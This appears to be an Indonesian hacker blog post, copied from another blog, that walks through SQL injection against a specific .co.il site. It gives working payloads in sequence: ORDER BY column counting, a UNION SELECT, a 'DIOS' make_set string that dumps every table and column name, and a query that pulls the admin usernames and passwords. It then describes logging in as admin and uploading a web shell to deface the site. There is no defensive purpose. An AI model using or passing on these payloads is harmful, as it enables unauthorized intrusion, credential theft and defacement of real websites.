Hello Whasaaap Mhamank :v Welcome Beck To My Blog Dengan Saia Admin Terkece Tertamvan Panutan Masyarakat :v ok Kali ini Gua Akan Kasih Tutorial eskiel :v
Oh ya Tutorial Ini Termasuk Gampang Gampang susah loh :v Karna Harus Cari Adlognya/Admin Login :v Untuk itu Use Your Brain :v
Dan Saran Gw Sebelum Lu Ngedios Lu Cari Adlognya Dulu Jadi Ga sia sia Lu ngedios :v
Coba Lu ngedios dulu belum tentu Lu nemu adlognya :v Eak eak :v (Itu tergantung muka sih sebenernya :v Ga kok Asw Kidding :v)Tergantung Elunya aja :v
Siapin Bahan Bahannya yak :)
Disini gw udah dapet target, kalo kalian belom punya dork buat dapet website vuln sqli kalian bisa baca dibawah ini.
Ini contoh target gw,
www.situs.co.il/advertiser_view.php?id=77
Lanjut kita bermain dengan order+by+1-- dan seterusnya sampai menemukan pesan error.
Disini w mendapatkan errornya di angka order+by+10-- berarti jumlah columnnya ada 9.
Ditarget gw ga ada error mysql blablabla atau error sqli yang lainnya, tapi disini errornya datanya hilang atau artikelnya kosong di bagian bawah about.(lihat gambar diatas)
Oke lanjut ketutorial berikutnya, masukan union select.
Selengkapnya seperti ini,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,9--
Dan mari kita lihat(gambar di atas), dibagian bawah about keluar angka magicknya atau biasa menyebutnya dengan angka ajaib
Kalo ditutorial kemarin kita harus memasukan group_concat dll kali ini enggak, tinggal kita masukan code DIOS nya saja.
Disini w milih angka 9 aja dan berikut ini code DIOS nya,
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Untuk perintah lengkapnya kek gini gaes,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)--
Nah lihat itu(gambar diatas), semua column dan beserta table sudah muncul.
Yang kiri itu column kalo yang kanan itu tablenya. Tinggal kita dump deh gaes hehe.
Lanjut ke tutorial ngedumpnya ,cari nama admin atau apa yang sekiranya berbau admin.
Disini target gw nama column admin nya adalah admin dan untuk nama tablenya adalah USER_NAME dan PASSWORD bisa lihat digambar bawah ini,
Berarti kita perintahnya untuk memasukan ke code dios nya jadi gini,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--
Dan bummmm lihat(gambar diatas), Ternyata kita berhasil ngedump username dan passwordnya.
Setelah itu tinggal cari tempat admin loginya, tapi disini gw udah tau tempat admin loginya jadi tinggal login.
Sekarang cari tempat buat upload shell, lihat gambar dibawah ini,
Setelah menemukan tempat buat upload shell, sekarang saatnya upload shell kalian.
Kalo belum punya shell kalian bisa cari dipostingan gw ada kok.
Dan disini gw udah berhasil uploadnya, liat gambar dibawah ini,
silahkan akses shellnya Dengan tekan Terus gambar rusak ,klik buka di tab baru dan Boom silahkan mau di apakan :v
Btw Gw copas dari sebuah blog Karna Apa Karan W cape dengan dunia ini :v
Source By : http://maqlo-heker.blogspot.com/2018/01/cara-deface-sqli-dengan-dios-dump-in.html?m=1